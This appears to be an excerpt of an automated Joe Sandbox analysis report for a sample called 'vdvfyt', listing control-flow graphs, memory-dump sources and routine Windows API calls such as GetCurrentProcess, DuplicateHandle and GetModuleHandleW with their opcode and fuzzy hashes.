                                                                                                            execution_graph 14452 2f1f030 DuplicateHandle 14453 2f1f0c6 14452->14453 14458 2f1e9e0 14459 2f1ea26 GetCurrentProcess 14458->14459 14461 2f1ea71 14459->14461 14462 2f1ea78 GetCurrentThread 14459->14462 14461->14462 14463 2f1eab5 GetCurrentProcess 14462->14463 14464 2f1eaae 14462->14464 14465 2f1eaeb GetCurrentThreadId 14463->14465 14464->14463 14467 2f1eb44 14465->14467 14454 2f1c938 14455 2f1c980 GetModuleHandleW 14454->14455 14456 2f1c97a 14454->14456 14457 2f1c9ad 14455->14457 14456->14455

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 02F1EA5E
                                                                                                            • GetCurrentThread.KERNEL32 ref: 02F1EA9B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 02F1EAD8
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02F1EB31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360924910.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2f10000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: d3e7fa95b66182cbafd1eaf6b437af6a2b2d7ddd937f52736736f9fb1cbde568
                                                                                                            • Instruction ID: 844562d9b38175ca0fb285a74a330e362b0b307638bbc2ad70b29f7df6e11188
                                                                                                            • Opcode Fuzzy Hash: d3e7fa95b66182cbafd1eaf6b437af6a2b2d7ddd937f52736736f9fb1cbde568
                                                                                                            • Instruction Fuzzy Hash: 895135B0900749DFDB54CFAAD548BDEBBF1FB88304F208059E509A73A0DB749948CB65

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 21 2f1f030-2f1f0c4 DuplicateHandle 22 2f1f0c6-2f1f0cc 21->22 23 2f1f0cd-2f1f0ea 21->23 22->23
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F1F0B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360924910.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2f10000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: e929b30c15d6a7de4ac7a121c8cae649e19eaf8eb8a1b145c4d2e85bfea96f80
                                                                                                            • Instruction ID: 0ac2e52fe50b13518aa4e7791465d9c572824082b9ab26a4654e5b5da84356e1
                                                                                                            • Opcode Fuzzy Hash: e929b30c15d6a7de4ac7a121c8cae649e19eaf8eb8a1b145c4d2e85bfea96f80
                                                                                                            • Instruction Fuzzy Hash: EF21E4B5900348EFDB10CFAAD984ADEFBF9EB48710F14801AE914A3310C378A944CFA5

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 26 2f1c938-2f1c978 27 2f1c980-2f1c9ab GetModuleHandleW 26->27 28 2f1c97a-2f1c97d 26->28 29 2f1c9b4-2f1c9c8 27->29 30 2f1c9ad-2f1c9b3 27->30 28->27 30->29
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02F1C99E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360924910.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2f10000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 270f42cdd6be3219808bda3db722c21acfd18577097926be4148cab904ea01b2
                                                                                                            • Instruction ID: 083f46cf59f56e311125d757acccbde5e886367f1a6a7015b7f51dfa1e066852
                                                                                                            • Opcode Fuzzy Hash: 270f42cdd6be3219808bda3db722c21acfd18577097926be4148cab904ea01b2
                                                                                                            • Instruction Fuzzy Hash: 701110B5C00749CFDB10CF9AC444BDEFBF5AB88314F10841AD919A7210C379A545CFA2

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1192 15cd4a0-15cd4b2 1193 15cd4b8 1192->1193 1194 15cd546-15cd54d 1192->1194 1195 15cd4ba-15cd4c6 1193->1195 1194->1195 1196 15cd4cc-15cd4ee 1195->1196 1197 15cd552-15cd557 1195->1197 1199 15cd55c-15cd571 1196->1199 1200 15cd4f0-15cd50e 1196->1200 1197->1196 1205 15cd528-15cd530 1199->1205 1202 15cd516-15cd526 1200->1202 1204 15cd57e 1202->1204 1202->1205 1206 15cd532-15cd543 1205->1206 1207 15cd573-15cd57c 1205->1207 1207->1206
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360528240.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_15cd000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e225e62e53cfeee620595956a8e4389d7572ca242eb86b0a4d49806fed63e779
                                                                                                            • Instruction ID: c90156df80e04303e7824d5a8c6929bb7e7ead0bd365d41a87c123db164ec4c8
                                                                                                            • Opcode Fuzzy Hash: e225e62e53cfeee620595956a8e4389d7572ca242eb86b0a4d49806fed63e779
                                                                                                            • Instruction Fuzzy Hash: BD212172500200EFDB01DF98D9C0B2ABFB1FB98718F20857DE9098E256C376D446CAE2

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1209 2d8d01c-2d8d02e 1210 2d8d0bd-2d8d0c4 1209->1210 1211 2d8d034 1209->1211 1212 2d8d036-2d8d042 1210->1212 1211->1212 1214 2d8d048-2d8d06a 1212->1214 1215 2d8d0c9-2d8d0ce 1212->1215 1216 2d8d06c-2d8d086 1214->1216 1217 2d8d0d3-2d8d0e8 1214->1217 1215->1214 1220 2d8d08e-2d8d09d 1216->1220 1221 2d8d09f-2d8d0a7 1217->1221 1220->1221 1222 2d8d0f5 1220->1222 1223 2d8d0a9-2d8d0ba 1221->1223 1224 2d8d0ea-2d8d0f3 1221->1224 1224->1223
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360673040.0000000002D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D8D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2d8d000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a675ff28c656d57aaf18703f6eec9b2b111f83978e2681634a2514ae08d0f6d6
                                                                                                            • Instruction ID: 9d2c44b6d1d72a4d828dca2a39f9858d569d9eebabeb4388284aa087618ee798
                                                                                                            • Opcode Fuzzy Hash: a675ff28c656d57aaf18703f6eec9b2b111f83978e2681634a2514ae08d0f6d6
                                                                                                            • Instruction Fuzzy Hash: 2521D071604204EFDB14EF24E980B26BB66EB84314F30C56DE94A4B3C6C33AD846CA62